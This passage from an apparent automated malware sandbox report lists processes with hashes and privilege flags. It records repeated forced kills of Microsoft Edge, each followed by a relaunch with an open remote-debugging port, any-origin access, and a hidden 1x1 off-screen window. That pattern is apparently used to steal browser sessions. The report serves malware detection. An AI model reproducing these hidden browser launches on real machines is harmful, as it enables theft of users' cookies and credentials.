                                                                                                                                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                                                    Start time:16:13:06
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --no-sandbox --mojo-platform-channel-handle=5212 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                                                    Start time:16:13:06
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --no-sandbox --onnx-enabled-for-ee --mojo-platform-channel-handle=5288 --field-trial-handle=2088,i,16928911371051510587,15929168129410231478,262144 /prefetch:8
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                                                    Start time:16:13:13
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                                                    Start time:16:13:13
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                                                    Start time:16:13:14
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                                                    Start time:16:13:15
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2060 --field-trial-handle=2044,i,10299215320425230575,4651246496313237729,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                                                    Start time:16:13:47
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                                                    Start time:16:13:47
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                                                    Start time:16:13:48
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                                                    Start time:16:13:48
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1900 --field-trial-handle=1820,i,7547783680648845572,51913072553389247,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                                                    Start time:16:13:48
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                                                    Start time:16:13:49
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=1944,i,16409252098928237948,2804454962869156604,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                                                    Start time:16:13:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                                                    Start time:16:13:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                                                    Start time:16:13:52
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:43
                                                                                                                                                                                                                                                                                    Start time:16:13:53
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1992 --field-trial-handle=1984,i,13849923393269030122,6960310804162820748,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:44
                                                                                                                                                                                                                                                                                    Start time:16:13:57
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:45
                                                                                                                                                                                                                                                                                    Start time:16:13:57
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:46
                                                                                                                                                                                                                                                                                    Start time:16:13:57
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:47
                                                                                                                                                                                                                                                                                    Start time:16:13:58
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1976 --field-trial-handle=2008,i,9308063002193397324,7617717190082231844,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:48
                                                                                                                                                                                                                                                                                    Start time:16:14:01
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:49
                                                                                                                                                                                                                                                                                    Start time:16:14:02
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:50
                                                                                                                                                                                                                                                                                    Start time:16:14:02
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:51
                                                                                                                                                                                                                                                                                    Start time:16:14:03
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2000 --field-trial-handle=1952,i,12058209678058939183,18292394788327998735,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:52
                                                                                                                                                                                                                                                                                    Start time:16:14:03
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                                                                                    Target ID:53
                                                                                                                                                                                                                                                                                    Start time:16:14:03
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=1796 --field-trial-handle=1976,i,7400251867187163904,16596075297624197194,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:54
                                                                                                                                                                                                                                                                                    Start time:16:14:06
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\taskkill.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:taskkill /F /IM msedge.exe
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff7dbb40000
                                                                                                                                                                                                                                                                                    File size:101'376 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:A599D3B2FAFBDE4C1A6D7D0F839451C7
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:55
                                                                                                                                                                                                                                                                                    Start time:16:14:07
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:56
                                                                                                                                                                                                                                                                                    Start time:16:14:07
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
                                                                                                                                                                                                                                                                                    File size:4'210'216 bytes
                                                                                                                                                                                                                                                                                    MD5 hash:69222B8101B0601CC6663F8381E7E00F
                                                                                                                                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                                                    Target ID:57
                                                                                                                                                                                                                                                                                    Start time:16:14:09
                                                                                                                                                                                                                                                                                    Start date:21/11/2024
                                                                                                                                                                                                                                                                                    Path:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --mojo-platform-channel-handle=2028 --field-trial-handle=2072,i,10086388543525150853,10806765783338913664,262144 /prefetch:3
                                                                                                                                                                                                                                                                                    Imagebase:0x7ff6c1cf0000
